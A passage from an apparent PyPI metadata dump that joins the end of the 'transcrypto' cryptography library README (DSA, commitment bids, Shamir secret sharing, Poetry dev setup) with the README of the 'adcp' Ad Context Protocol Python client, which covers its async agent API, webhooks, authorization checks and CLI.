print(shared.prime_modulus) # p
print(shared.prime_seed) # q (q | p-1)
print(shared.group_base) # g
# Individual key pair
priv = dsa.DSAPrivateKey.New(shared)
pub = dsa.DSAPublicKey.Copy(priv)
# Safe Sign & verify
msg = b'xyz'
signature = priv.Sign(msg) # can also have associated_data, optionally
assert pub.Verify(msg, signature)
# Raw Sign & verify (message must be 1 ≤ m < q)
msg = 123456789 % shared.prime_seed
sig = priv.RawSign(msg)
assert pub.RawVerify(msg, sig)
```
- ranges:
- `1 ≤ message < q`
- signatures: `(s1, s2)` with `2 ≤ s1, s2 < q`
- errors:
- invalid ranges → `base.InputError`
- inconsistent parameters → `key.CryptoError`
##### Security notes
- Choose **large** parameters (e.g., `p ≥ 2048 bits`, `q ≥ 224 bits`) for non-toy settings.
- In practice, compute `m = int.from_bytes(Hash(message), 'big') % q` before calling `Sign(m)`.
##### Advanced: custom primes generator
```py
# Generate primes (p, q) with q | (p-1); also returns m = (p-1)//q
p, q, m = dsa.NBitRandomDSAPrimes(1024, 160)
assert (p - 1) % q == 0
```
Used internally by `DSASharedPublicKey.NewShared()`.
Search breadth and retry caps are bounded; repeated failures raise `key.CryptoError`.
#### Public Bidding
This is a way of bidding on some commitment (the `secret`) that can be cryptographically proved later to not have been changed. To do that the secret is combined with 2 nonces (random values, `n1` & `n2`) and a hash of it is taken (`H=SHA-512(n1||n2||secret)`). The hash `H` and one nonce `n1` are public and divulged. The other nonce `n2` and the `secret` are kept private and will be used to show `secret` was not changed since the beginning of the process. The nonces guarantee the `secret` cannot be brute-forced or changed after-the-fact. The whole process is as strong as SHA-512 collisions.
```py
from transcrypto.core import bid
# Generate the private and public bids
bid_priv = bid.PrivateBid512.New(secret) # this one you keep private
bid_pub = bid.PublicBid512.Copy(bid_priv) # this one you publish
# Checking that a bid is genuine requires the public bid and knowing the nonce and the secret:
print(bid_pub.VerifyBid(private_key, secret_bid)) # these come from a divulged private bid
# of course, you want to also make sure the provided private data matches your version of it, e.g.:
bid_pub_expected = bid.PublicBid512.Copy(bid_priv)
print(bid_pub == bid_pub_expected)
```
#### SSS (Shamir Shared Secret)
<https://en.wikipedia.org/wiki/Shamir's_secret_sharing>
This is the information-theoretic SSS but with no authentication or binding between share and secret. Malicious share injection is possible! Add MAC or digital signature in hostile settings. Use at least 128-bit modulus for non-toy deployments; `MakeDataShares()` requires > 256 bits.
```py
from transcrypto.core import sss
# Generate parameters: at least 3 of 5 shares needed,
# coefficients & modulus are 264-bit primes (> 256 bits required for MakeDataShares)
priv = sss.ShamirSharedSecretPrivate.New(3, 264)
pub = sss.ShamirSharedSecretPublic.Copy(priv) # what you publish
print(f'threshold : {pub.minimum}')
print(f'prime mod : {pub.modulus}')
print(f'poly coefficients: {priv.polynomial}') # keep these private!
# Safe Issuing shares
secret = b'xyz'
# Generate 5 shares, each has a copy of the encrypted secret
five_shares = priv.MakeDataShares(secret, 5)
for sh in five_shares:
print(sh)
# Raw Issuing shares
secret = 0xC0FFEE
# Generate an unlimited stream; here we take 5
five_shares = list(priv.RawShares(secret, max_shares=5))
for sh in five_shares:
print(f'share {sh.share_key} → {sh.share_value}')
```
A single share object looks like `sss.ShamirSharePrivate(minimum=3, modulus=..., share_key=42, share_value=123456789)`.
```py
# Safe Re-constructing the secret
secret = b'xyz'
five_shares = priv.MakeDataShares(secret, 5)
subset = five_shares[:3] # any 3 distinct shares
recovered = subset[0].RecoverData(subset[1:]) # each share has the encrypted data, pass other shares
assert recovered == secret
# Raw Re-constructing the secret
secret = 0xC0FFEE
five_shares = list(priv.RawShares(secret, max_shares=5))
subset = five_shares[:3] # any 3 distinct shares
recovered = pub.RawRecoverSecret(subset)
assert recovered == secret
```
If you supply fewer than minimum shares you get a `key.CryptoError`, unless you explicitly override:
```py
try:
pub.RawRecoverSecret(five_shares[:2]) # raises
except Exception as e:
print(e) # "unrecoverable secret …"
# Force the interpolation even with 2 points (gives a wrong secret, of course)
print(pub.RawRecoverSecret(five_shares[:2], force_recover=True))
# Checking that a share is genuine
share = five_shares[0]
ok = priv.RawVerifyShare(secret, share) # ▶ True
tampered = sss.ShamirSharePrivate(
minimum=share.minimum,
modulus=share.modulus,
share_key=share.share_key,
share_value=(share.share_value + 1) % share.modulus)
print(priv.RawVerifyShare(secret, tampered)) # ▶ False
```
## Appendix: Development Instructions
### Setup
If you want to develop for this project, first install python 3.12 and [Poetry](https://python-poetry.org/docs/cli/), but to get the versions you will need, we suggest you do it like this (*Linux*):
```sh
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install git python3 python3-pip pipx python3-dev python3-venv build-essential software-properties-common
sudo add-apt-repository ppa:deadsnakes/ppa # install arbitrary python version
sudo apt-get update
sudo apt-get install python3.12
sudo apt-get remove python3-poetry
python3.12 -m pipx ensurepath
# re-open terminal
pipx install poetry
poetry --version # should be >=2.1
poetry config virtualenvs.in-project true # creates .venv inside project directory
poetry config pypi-token.pypi <TOKEN> # add your personal PyPI project token, if any
```
or this (*Mac*):
```sh
brew update
brew upgrade
brew cleanup -s
brew install git python@3.12 # install arbitrary python version
brew uninstall poetry
python3.12 -m pip install --user pipx
python3.12 -m pipx ensurepath
# re-open terminal
pipx install poetry
poetry --version # should be >=2.1
poetry config virtualenvs.in-project true # creates .venv inside project directory
poetry config pypi-token.pypi <TOKEN> # add your personal PyPI project token, if any
```
Now install the project:
```sh
git clone https://github.com/balparda/transcrypto.git transcrypto
cd transcrypto
poetry env use python3.12 # creates the venv
poetry sync # sync env to project's poetry.lock file
poetry env info # no-op: just to check
poetry run pytest -vvv
# or any command as:
poetry run <any-command>
```
To activate like a regular environment do:
```sh
poetry env activate
# will print activation command which you next execute, or you can do:
source .venv/bin/activate # if .venv is local to the project
source "$(poetry env info --path)/bin/activate" # for other paths
pytest # or other commands
deactivate
```
### Updating Dependencies
To update `poetry.lock` file to more current versions do `poetry update`, it will ignore the current lock, update, and rewrite the `poetry.lock` file. If you have cache problems `poetry cache clear PyPI --all` will clean it.
To add a new dependency you should do:
```sh
poetry add "pkg>=1.2.3" # regenerates lock, updates env (adds dep to prod code)
poetry add -G dev "pkg>=1.2.3" # adds dep to dev code ("group" dev)
# also remember: "pkg@^1.2.3" = latest 1.* ; "pkg@~1.2.3" = latest 1.2.* ; "pkg@1.2.3" exact
```
If you manually added a dependency to `pyproject.toml` you should ***very carefully*** recreate the environment and files:
```sh
rm -rf .venv .poetry poetry.lock
poetry env use python3.12
poetry install
```
Remember to check your diffs before submitting (especially `poetry.lock`) to avoid surprises!
When dependencies change, always regenerate `requirements.txt` by running:
```sh
make req # or: poetry export --format requirements.txt --without-hashes --output requirements.txt
```
### Creating a New Version
```sh
# bump the version!
poetry version minor # updates 1.6 to 1.7, for example
# or:
poetry version patch # updates 1.6 to 1.6.1
# or:
poetry version <version-number>
# (also updates `pyproject.toml` and `poetry.lock`)
# publish to GIT, including a TAG
git commit -a -m "release version 1.0.2"
git tag 1.0.2
git push
git push --tags
# prepare package for PyPI
poetry build
poetry publish
```
If you changed the CLI interface at all, in any tool, run `make docs` or even better `make ci`.
You can find the 10 top slowest tests by running:
```sh
poetry run pytest -vvv -q --durations=30
poetry run pytest -vvv -q --durations=30 -m "not slow" # find slow > 0.1s
poetry run pytest -vvv -q --durations=30 -m "not veryslow" # find veryslow > 1s
poetry run pytest -vvv -q --durations=30 -m slow # check
poetry run pytest -vvv -q --durations=30 -m veryslow # check
```
You can search for flaky tests by running all tests 100 times, or more:
```sh
poetry run pytest --flake-finder --flake-runs=100
poetry run pytest --flake-finder --flake-runs=500 -m "not veryslow"
poetry run pytest --flake-finder --flake-runs=10000 -m "not slow"
```
You can instrument your code to find bottlenecks:
```sh
$ source .venv/bin/activate
$ which transcrypto
/path/to/.venv/bin/transcrypto # place this in the command below:
$ pyinstrument -r html -o dsa_shared.html -- /path/to/.venv/bin/transcrypto -p rsa-key rsa new
$ deactivate
```
Hint: 85%+ is inside `MillerRabinIsPrime()`/`gmpy2.powmod()`...
| text/markdown | Daniel Balparda | balparda@github.com | null | null | Apache-2.0 | cryptography, validation, encryption, signing, random-generation, prime-numbers, aes-encryption, decryption, rsa-cryptography, elgamal-encryption, dsa-algorithm, modular-mathematics, rsa, dsa, elgamal, aes, python, poetry, typer, rich, cli | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Operating System :: OS Independent",
"Topic :: Utilities",
"Topic :: Security :: Cryptography"
] | [] | https://github.com/balparda/transcrypto | null | >=3.12 | [] | [] | [] | [
"typer>=0.24",
"rich>=14.3.3",
"platformdirs>=4.9",
"cryptography>=46.0",
"gmpy2>=2.3",
"zstandard>=0.25"
] | [] | [] | [] | [
"Homepage, https://github.com/balparda/transcrypto",
"Repository, https://github.com/balparda/transcrypto",
"Issues, https://github.com/balparda/transcrypto/issues",
"Changelog, https://github.com/balparda/transcrypto/blob/main/CHANGELOG.md",
"PyPI, https://pypi.org/project/transcrypto/"
] | poetry/2.1.3 CPython/3.13.5 Darwin/25.2.0 | 2026-02-20T09:28:16.422207 | transcrypto-2.3.2.tar.gz | 160,312 | 92/9a/80302bd78ca92269e35416c685c54566e8fa31dc53f0d7254ad7705f01d6/transcrypto-2.3.2.tar.gz | source | sdist | null | false | b0fefe0062ea5800366958a0e2d6b586 | 6bc64beff7d23a4b1099b28c358ddb95d999111203a759e1c680830d0a96c28a | 929a80302bd78ca92269e35416c685c54566e8fa31dc53f0d7254ad7705f01d6 | null | [] | 335 |
2.4 | adcp | 3.4.0 | Official Python client for the Ad Context Protocol (AdCP) | # adcp - Python Client for Ad Context Protocol
[](https://badge.fury.io/py/adcp)
[](https://opensource.org/licenses/Apache-2.0)
[](https://www.python.org/downloads/)
Official Python client for the **Ad Context Protocol (AdCP)**. Build distributed advertising operations that work synchronously OR asynchronously with the same code.
## The Core Concept
AdCP operations are **distributed and asynchronous by default**. An agent might:
- Complete your request **immediately** (synchronous)
- Need time to process and **send results via webhook** (asynchronous)
- Ask for **clarifications** before proceeding
- Send periodic **status updates** as work progresses
**Your code stays the same.** You write handlers once, and they work for both sync completions and webhook deliveries.
## Installation
```bash
pip install adcp
```
> **Note**: This client requires Python 3.10 or later and supports both synchronous and asynchronous workflows.
## Quick Start: Test Helpers
The fastest way to get started is using pre-configured test agents with the **`.simple` API**:
```python
from adcp.testing import test_agent
# Zero configuration - just import and call with kwargs!
products = await test_agent.simple.get_products(
brief='Coffee subscription service for busy professionals'
)
print(f"Found {len(products.products)} products")
```
### Simple vs. Standard API
**Every ADCPClient** includes both API styles via the `.simple` accessor:
**Simple API** (`client.simple.*`) - Recommended for examples/prototyping:
```python
from adcp.testing import test_agent
# Kwargs and direct return - raises on error
products = await test_agent.simple.get_products(brief='Coffee brands')
print(products.products[0].name)
```
**Standard API** (`client.*`) - Recommended for production:
```python
from adcp.testing import test_agent
from adcp import GetProductsRequest
# Explicit request objects and TaskResult wrapper
request = GetProductsRequest(brief='Coffee brands')
result = await test_agent.get_products(request)
if result.success and result.data:
print(result.data.products[0].name)
else:
print(f"Error: {result.error}")
```
**When to use which:**
- **Simple API** (`.simple`): Quick testing, documentation, examples, notebooks
- **Standard API**: Production code, complex error handling, webhook workflows
### Available Test Helpers
Pre-configured agents (all include `.simple` accessor):
- **`test_agent`**: MCP test agent with authentication
- **`test_agent_a2a`**: A2A test agent with authentication
- **`test_agent_no_auth`**: MCP test agent without authentication
- **`test_agent_a2a_no_auth`**: A2A test agent without authentication
- **`creative_agent`**: Reference creative agent for preview functionality
- **`test_agent_client`**: Multi-agent client with both protocols
> **Note**: Test agents are rate-limited and for testing/examples only. DO NOT use in production.
See [examples/simple_api_demo.py](examples/simple_api_demo.py) for a complete comparison.
> **Tip**: Import types from the main `adcp` package (e.g., `from adcp import GetProductsRequest`) rather than `adcp.types.generated` for better API stability.
## Quick Start: Distributed Operations
For production use, configure your own agents:
```python
from adcp import ADCPMultiAgentClient, AgentConfig, GetProductsRequest
# Configure agents and handlers (context manager ensures proper cleanup)
async with ADCPMultiAgentClient(
agents=[
AgentConfig(
id="agent_x",
agent_uri="https://agent-x.com",
protocol="a2a"
),
AgentConfig(
id="agent_y",
agent_uri="https://agent-y.com/mcp/",
protocol="mcp"
)
],
# Webhook URL template (macros: {agent_id}, {task_type}, {operation_id})
webhook_url_template="https://myapp.com/webhook/{task_type}/{agent_id}/{operation_id}",
# Activity callback - fires for ALL events
on_activity=lambda activity: print(f"[{activity.type}] {activity.task_type}"),
# Status change handlers
handlers={
"on_get_products_status_change": lambda response, metadata: (
db.save_products(metadata.operation_id, response.products)
if metadata.status == "completed" else None
)
}
) as client:
# Execute operation - library handles operation IDs, webhook URLs, context management
agent = client.agent("agent_x")
request = GetProductsRequest(brief="Coffee brands")
result = await agent.get_products(request)
# Check result
if result.status == "completed":
# Agent completed synchronously!
print(f"✅ Sync completion: {len(result.data.products)} products")
if result.status == "submitted":
# Agent will send webhook when complete
print(f"⏳ Async - webhook registered at: {result.submitted.webhook_url}")
# Connections automatically cleaned up here
```
## Documentation
- **[API Reference](https://adcontextprotocol.github.io/adcp-client-python/)** - Complete API documentation with type signatures and examples
- **[Protocol Spec](https://github.com/adcontextprotocol/adcp)** - Ad Context Protocol specification
- **[Examples](examples/)** - Code examples and usage patterns
The API reference documentation is automatically generated from the code and includes:
- Full type signatures for all methods
- Field descriptions from JSON Schema
- Method documentation with examples
- Searchable interface
## Features
### Test Helpers
Pre-configured test agents for instant prototyping and testing:
```python
from adcp.testing import (
test_agent, test_agent_a2a,
test_agent_no_auth, test_agent_a2a_no_auth,
creative_agent, test_agent_client, create_test_agent
)
from adcp import GetProductsRequest, PreviewCreativeRequest
# 1. Single agent with authentication (MCP)
result = await test_agent.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 2. Single agent with authentication (A2A)
result = await test_agent_a2a.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 3. Single agent WITHOUT authentication (MCP)
# Useful for testing unauthenticated behavior
result = await test_agent_no_auth.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 4. Single agent WITHOUT authentication (A2A)
result = await test_agent_a2a_no_auth.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 5. Creative agent (preview functionality, no auth required)
result = await creative_agent.preview_creative(
PreviewCreativeRequest(
manifest={"format_id": "banner_300x250", "assets": {...}}
)
)
# 6. Multi-agent (parallel execution with both protocols)
results = await test_agent_client.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 7. Custom configuration
from adcp.client import ADCPClient
config = create_test_agent(id="my-test", timeout=60.0)
client = ADCPClient(config)
```
**Use cases:**
- Quick prototyping and experimentation
- Example code and documentation
- Integration testing without mock servers
- Testing authentication behavior (comparing auth vs no-auth results)
- Learning AdCP concepts
**Important:** Test agents are public, rate-limited, and for testing only. Never use in production.
### Full Protocol Support
- **A2A Protocol**: Native support for Agent-to-Agent protocol
- **MCP Protocol**: Native support for Model Context Protocol
- **Auto-detection**: Automatically detect which protocol an agent uses
### Type Safety
Full type hints with Pydantic validation and auto-generated types from the AdCP spec. All commonly-used types are exported from the main `adcp` package for convenience:
```python
from adcp import (
GetProductsRequest,
BrandManifest,
Package,
CpmFixedRatePricingOption,
MediaBuyStatus,
)
# All methods require typed request objects
request = GetProductsRequest(brief="Coffee brands", max_results=10)
result = await agent.get_products(request)
# result: TaskResult[GetProductsResponse]
if result.success:
for product in result.data.products:
print(product.name, product.pricing_options) # Full IDE autocomplete!
# Type-safe pricing with discriminators
pricing = CpmFixedRatePricingOption(
pricing_option_id="cpm_usd",
pricing_model="cpm",
is_fixed=True, # Literal[True] - type checked!
currency="USD",
rate=5.0
)
# Type-safe status enums
if media_buy.status == MediaBuyStatus.active:
print("Media buy is active")
```
**Exported from main package:**
- **Core domain types**: `BrandManifest`, `Creative`, `CreativeManifest`, `MediaBuy`, `Package`
- **Status enums**: `CreativeStatus`, `MediaBuyStatus`, `PackageStatus`, `PricingModel`
- **All 9 pricing options**: `CpcPricingOption`, `CpmFixedRatePricingOption`, `VcpmAuctionPricingOption`, etc.
- **Request/Response types**: All 16 operations with full request/response types
#### Semantic Type Aliases
For discriminated union types (success/error responses), use semantic aliases for clearer code:
```python
from adcp import (
CreateMediaBuySuccessResponse, # Clear: this is the success case
CreateMediaBuyErrorResponse, # Clear: this is the error case
)
def handle_response(
response: CreateMediaBuySuccessResponse | CreateMediaBuyErrorResponse
) -> None:
if isinstance(response, CreateMediaBuySuccessResponse):
print(f"✅ Media buy created: {response.media_buy_id}")
else:
print(f"❌ Errors: {response.errors}")
```
**Available semantic aliases:**
- Response types: `*SuccessResponse` / `*ErrorResponse` (e.g., `CreateMediaBuySuccessResponse`)
- Request variants: `*FormatRequest` / `*ManifestRequest` (e.g., `PreviewCreativeFormatRequest`)
- Preview renders: `PreviewRenderImage` / `PreviewRenderHtml` / `PreviewRenderIframe`
- Activation keys: `PropertyIdActivationKey` / `PropertyTagActivationKey`
See `examples/type_aliases_demo.py` for more examples.
**Import guidelines:**
- ✅ **DO**: Import from main package: `from adcp import GetProductsRequest`
- ✅ **DO**: Use semantic aliases: `from adcp import CreateMediaBuySuccessResponse`
- ⚠️ **AVOID**: Import from internal modules: `from adcp.types._generated import CreateMediaBuyResponse1`
The main package exports provide a stable API while internal generated types may change.
### Multi-Agent Operations
Execute across multiple agents simultaneously:
```python
from adcp import GetProductsRequest
# Parallel execution across all agents
request = GetProductsRequest(brief="Coffee brands")
results = await client.get_products(request)
for result in results:
if result.status == "completed":
print(f"Sync: {len(result.data.products)} products")
elif result.status == "submitted":
print(f"Async: webhook to {result.submitted.webhook_url}")
```
### Webhook Handling
Single endpoint handles all webhooks:
```python
from fastapi import FastAPI, Request
app = FastAPI()
@app.post("/webhook/{task_type}/{agent_id}/{operation_id}")
async def webhook(task_type: str, agent_id: str, operation_id: str, request: Request):
payload = await request.json()
payload["task_type"] = task_type
payload["operation_id"] = operation_id
# Route to agent client - handlers fire automatically
agent = client.agent(agent_id)
await agent.handle_webhook(
payload,
request.headers.get("x-adcp-signature")
)
return {"received": True}
```
### Security
Webhook signature verification built-in:
```python
client = ADCPMultiAgentClient(
agents=agents,
webhook_secret=os.getenv("WEBHOOK_SECRET")
)
# Signatures verified automatically on handle_webhook()
```
### Debug Mode
Enable debug mode to see full request/response details:
```python
agent_config = AgentConfig(
id="agent_x",
agent_uri="https://agent-x.com",
protocol="mcp",
debug=True # Enable debug mode
)
result = await client.agent("agent_x").get_products(brief="Coffee brands")
# Access debug information
if result.debug_info:
print(f"Duration: {result.debug_info.duration_ms}ms")
print(f"Request: {result.debug_info.request}")
print(f"Response: {result.debug_info.response}")
```
Or use the CLI:
```bash
uvx adcp --debug myagent get_products '{"brief":"TV ads"}'
```
### Resource Management
**Why use async context managers?**
- Ensures HTTP connections are properly closed, preventing resource leaks
- Handles cleanup even when exceptions occur
- Required for production applications with connection pooling
- Prevents issues with async task group cleanup in MCP protocol
The recommended pattern uses async context managers:
```python
from adcp import ADCPClient, AgentConfig, GetProductsRequest
# Recommended: Automatic cleanup with context manager
config = AgentConfig(id="agent_x", agent_uri="https://...", protocol="a2a")
async with ADCPClient(config) as client:
request = GetProductsRequest(brief="Coffee brands")
result = await client.get_products(request)
# Connection automatically closed on exit
# Multi-agent client also supports context managers
async with ADCPMultiAgentClient(agents) as client:
# Execute across all agents in parallel
results = await client.get_products(request)
# All agent connections closed automatically (even if some failed)
```
Manual cleanup is available for special cases (e.g., managing client lifecycle manually):
```python
# Use manual cleanup when you need fine-grained control over lifecycle
client = ADCPClient(config)
try:
result = await client.get_products(request)
finally:
await client.close() # Explicit cleanup
```
**When to use manual cleanup:**
- Managing client lifecycle across multiple functions
- Testing scenarios requiring explicit control
- Integration with frameworks that manage resources differently
In most cases, prefer the context manager pattern.
### Error Handling
The library provides a comprehensive exception hierarchy with helpful error messages:
```python
from adcp.exceptions import (
ADCPError, # Base exception
ADCPConnectionError, # Connection failed
ADCPAuthenticationError, # Auth failed (401, 403)
ADCPTimeoutError, # Request timed out
ADCPProtocolError, # Invalid response format
ADCPToolNotFoundError, # Tool not found
ADCPWebhookSignatureError # Invalid webhook signature
)
try:
result = await client.agent("agent_x").get_products(brief="Coffee")
except ADCPAuthenticationError as e:
# Exception includes agent context and helpful suggestions
print(f"Auth failed for {e.agent_id}: {e.message}")
print(f"Suggestion: {e.suggestion}")
except ADCPTimeoutError as e:
print(f"Request timed out after {e.timeout}s")
except ADCPConnectionError as e:
print(f"Connection failed: {e.message}")
print(f"Agent URI: {e.agent_uri}")
except ADCPError as e:
# Catch-all for other AdCP errors
print(f"AdCP error: {e.message}")
```
All exceptions include:
- **Contextual information**: agent ID, URI, and operation details
- **Actionable suggestions**: specific steps to fix common issues
- **Error classification**: proper HTTP status code handling
## Available Tools
All AdCP tools with full type safety:
**Media Buy Lifecycle:**
- `get_products()` - Discover advertising products
- `list_creative_formats()` - Get supported creative formats
- `create_media_buy()` - Create new media buy
- `update_media_buy()` - Update existing media buy
- `sync_creatives()` - Upload/sync creative assets
- `list_creatives()` - List creative assets
- `get_media_buy_delivery()` - Get delivery performance
**Creative Management:**
- `preview_creative()` - Preview creative before building
- `build_creative()` - Generate production-ready creative assets
**Discovery & Accounts:**
- `get_adcp_capabilities()` - Discover agent capabilities and authorized publishers
- `list_accounts()` - List billing accounts
**Audience & Targeting:**
- `get_signals()` - Get audience signals
- `activate_signal()` - Activate audience signals
- `provide_performance_feedback()` - Send performance feedback
## Workflow Examples
### Complete Media Buy Workflow
A typical media buy workflow involves discovering products, creating the buy, and managing creatives:
```python
from adcp import ADCPClient, AgentConfig, GetProductsRequest, CreateMediaBuyRequest
from adcp import BrandManifest, PublisherPropertiesAll
# 1. Connect to agent
config = AgentConfig(id="sales_agent", agent_uri="https://...", protocol="mcp")
async with ADCPClient(config) as client:
# 2. Discover available products
products_result = await client.get_products(
GetProductsRequest(brief="Premium video inventory for coffee brand")
)
if products_result.success:
product = products_result.data.products[0]
print(f"Found product: {product.name}")
# 3. Create media buy reservation
media_buy_result = await client.create_media_buy(
CreateMediaBuyRequest(
brand_manifest=BrandManifest(
name="Coffee Co",
brand_url="https://coffeeco.com",
logo_url="https://coffeeco.com/logo.png",
# ... additional brand details
),
packages=[{
"package_id": product.packages[0].package_id,
"quantity": 1000000 # impressions
}],
publisher_properties=PublisherPropertiesAll(
selection_type="all" # Target all authorized properties
)
)
)
if media_buy_result.success:
media_buy_id = media_buy_result.data.media_buy_id
print(f"✅ Media buy created: {media_buy_id}")
# 4. Update media buy if needed
from adcp import UpdateMediaBuyPackagesRequest
update_result = await client.update_media_buy(
UpdateMediaBuyPackagesRequest(
media_buy_id=media_buy_id,
packages=[{
"package_id": product.packages[0].package_id,
"quantity": 1500000 # Increase budget
}]
)
)
if update_result.success:
print("✅ Media buy updated")
```
### Complete Creative Workflow
Build and deliver production-ready creatives:
```python
from adcp import ADCPClient, AgentConfig
from adcp import PreviewCreativeFormatRequest, BuildCreativeRequest
from adcp import CreativeManifest, PlatformDeployment
# 1. Connect to creative agent
config = AgentConfig(id="creative_agent", agent_uri="https://...", protocol="mcp")
async with ADCPClient(config) as client:
# 2. List available formats
formats_result = await client.list_creative_formats()
if formats_result.success:
format_id = formats_result.data.formats[0].format_id
print(f"Using format: {format_id.id}")
# 3. Preview creative (test before building)
preview_result = await client.preview_creative(
PreviewCreativeFormatRequest(
target_format_id=format_id.id,
inputs={
"headline": "Fresh Coffee Daily",
"cta": "Order Now"
},
output_format="url" # Get preview URL
)
)
if preview_result.success:
preview_url = preview_result.data.renders[0].url
print(f"Preview at: {preview_url}")
# 4. Build production creative
build_result = await client.build_creative(
BuildCreativeRequest(
manifest=CreativeManifest(
format_id=format_id,
brand_url="https://coffeeco.com",
# ... creative content
),
target_format_id=format_id.id,
deployment=PlatformDeployment(
type="platform",
platform_id="google_admanager"
)
)
)
if build_result.success:
vast_url = build_result.data.assets[0].url
print(f"✅ Creative ready: {vast_url}")
```
### Integrated Workflow: Media Buy + Creatives
Combine both workflows for a complete campaign setup:
```python
from adcp import ADCPMultiAgentClient, AgentConfig
from adcp import GetProductsRequest, CreateMediaBuyRequest, BuildCreativeRequest
# Connect to both sales and creative agents
async with ADCPMultiAgentClient(
agents=[
AgentConfig(id="sales", agent_uri="https://sales-agent.com", protocol="mcp"),
AgentConfig(id="creative", agent_uri="https://creative-agent.com", protocol="mcp"),
]
) as client:
# 1. Get products from sales agent
sales_agent = client.agent("sales")
products = await sales_agent.simple.get_products(
brief="Premium video inventory"
)
# 2. Get creative formats from creative agent
creative_agent = client.agent("creative")
formats = await creative_agent.simple.list_creative_formats()
# 3. Build creative asset
creative_result = await creative_agent.build_creative(
BuildCreativeRequest(
manifest=creative_manifest,
target_format_id=formats.formats[0].format_id.id
)
)
# 4. Create media buy with creative
media_buy_result = await sales_agent.create_media_buy(
CreateMediaBuyRequest(
brand_manifest=brand_manifest,
packages=[{"package_id": products.products[0].packages[0].package_id}],
publisher_properties=publisher_properties,
creative_urls=[creative_result.data.assets[0].url]
)
)
print(f"✅ Campaign live: {media_buy_result.data.media_buy_id}")
```
## Property Discovery (AdCP v2.2.0)
Build agent registries by discovering properties agents can sell:
```python
from adcp.discovery import PropertyCrawler, get_property_index
# Crawl agents to discover properties
crawler = PropertyCrawler()
await crawler.crawl_agents([
{"agent_url": "https://agent-x.com", "protocol": "a2a"},
{"agent_url": "https://agent-y.com/mcp/", "protocol": "mcp"}
])
index = get_property_index()
# Query 1: Who can sell this property?
matches = index.find_agents_for_property("domain", "cnn.com")
# Query 2: What can this agent sell?
auth = index.get_agent_authorizations("https://agent-x.com")
# Query 3: Find by tags
premium = index.find_agents_by_property_tags(["premium", "ctv"])
```
## Publisher Authorization Validation
Verify sales agents are authorized to sell publisher properties via adagents.json:
```python
from adcp import (
fetch_adagents,
verify_agent_authorization,
verify_agent_for_property,
)
# Fetch and parse adagents.json from publisher
adagents_data = await fetch_adagents("publisher.com")
# Verify agent authorization for a property
is_authorized = verify_agent_authorization(
adagents_data=adagents_data,
agent_url="https://sales-agent.example.com",
property_type="website",
property_identifiers=[{"type": "domain", "value": "publisher.com"}]
)
# Or use convenience wrapper (fetch + verify in one call)
is_authorized = await verify_agent_for_property(
publisher_domain="publisher.com",
agent_url="https://sales-agent.example.com",
property_identifiers=[{"type": "domain", "value": "publisher.com"}],
property_type="website"
)
```
**Domain Matching Rules:**
- Exact match: `example.com` matches `example.com`
- Common subdomains: `www.example.com` matches `example.com`
- Wildcards: `api.example.com` matches `*.example.com`
- Protocol-agnostic: `http://agent.com` matches `https://agent.com`
**Use Cases:**
- Sales agents verify authorization before accepting media buys
- Publishers test their adagents.json files
- Developer tools build authorization validators
See `examples/adagents_validation.py` for complete examples.
### Authorization Discovery
Discover which publishers have authorized your agent using two approaches:
**1. "Push" Approach** - Ask the agent (recommended, fastest):
```python
from adcp import ADCPClient, GetAdcpCapabilitiesRequest
async with ADCPClient(agent_config) as client:
# Single API call to agent
result = await client.get_adcp_capabilities(GetAdcpCapabilitiesRequest())
if result.success and result.data.media_buy:
portfolio = result.data.media_buy.portfolio
print(f"Authorized for: {portfolio.publisher_domains}")
```
**2. "Pull" Approach** - Check publisher adagents.json files (when you need property details):
```python
from adcp import fetch_agent_authorizations
# Check specific publishers (fetches in parallel)
contexts = await fetch_agent_authorizations(
"https://our-sales-agent.com",
["nytimes.com", "wsj.com", "cnn.com"]
)
for domain, ctx in contexts.items():
print(f"{domain}:")
print(f" Property IDs: {ctx.property_ids}")
print(f" Tags: {ctx.property_tags}")
```
**When to use which:**
- **Push**: Quick discovery, portfolio overview, high-level authorization check
- **Pull**: Property-level details, specific publisher list, works offline
See `examples/fetch_agent_authorizations.py` for complete examples.
## CLI Tool
The `adcp` command-line tool provides easy interaction with AdCP agents without writing code.
### Installation
```bash
# Install globally
pip install adcp
# Or use uvx to run without installing
uvx adcp --help
```
### Quick Start
```bash
# Save agent configuration
uvx adcp --save-auth myagent https://agent.example.com mcp
# List tools available on agent
uvx adcp myagent list_tools
# Execute a tool
uvx adcp myagent get_products '{"brief":"TV ads"}'
# Use from stdin
echo '{"brief":"TV ads"}' | uvx adcp myagent get_products
# Use from file
uvx adcp myagent get_products @request.json
# Get JSON output
uvx adcp --json myagent get_products '{"brief":"TV ads"}'
# Enable debug mode
uvx adcp --debug myagent get_products '{"brief":"TV ads"}'
```
### Using Test Agents from CLI
The CLI provides easy access to public test agents without configuration:
```bash
# Use test agent with authentication (MCP)
uvx adcp https://test-agent.adcontextprotocol.org/mcp/ \
--auth 1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ \
get_products '{"brief":"Coffee brands"}'
# Use test agent WITHOUT authentication (MCP)
uvx adcp https://test-agent.adcontextprotocol.org/mcp/ \
get_products '{"brief":"Coffee brands"}'
# Use test agent with authentication (A2A)
uvx adcp --protocol a2a \
--auth 1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ \
https://test-agent.adcontextprotocol.org \
get_products '{"brief":"Coffee brands"}'
# Save test agent for easier access
uvx adcp --save-auth test-agent https://test-agent.adcontextprotocol.org/mcp/ mcp
# Enter token when prompted: 1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ
# Now use saved config
uvx adcp test-agent get_products '{"brief":"Coffee brands"}'
# Use creative agent (no auth required)
uvx adcp https://creative.adcontextprotocol.org/mcp \
preview_creative @creative_manifest.json
```
**Test Agent Details:**
- **URL (MCP)**: `https://test-agent.adcontextprotocol.org/mcp/`
- **URL (A2A)**: `https://test-agent.adcontextprotocol.org`
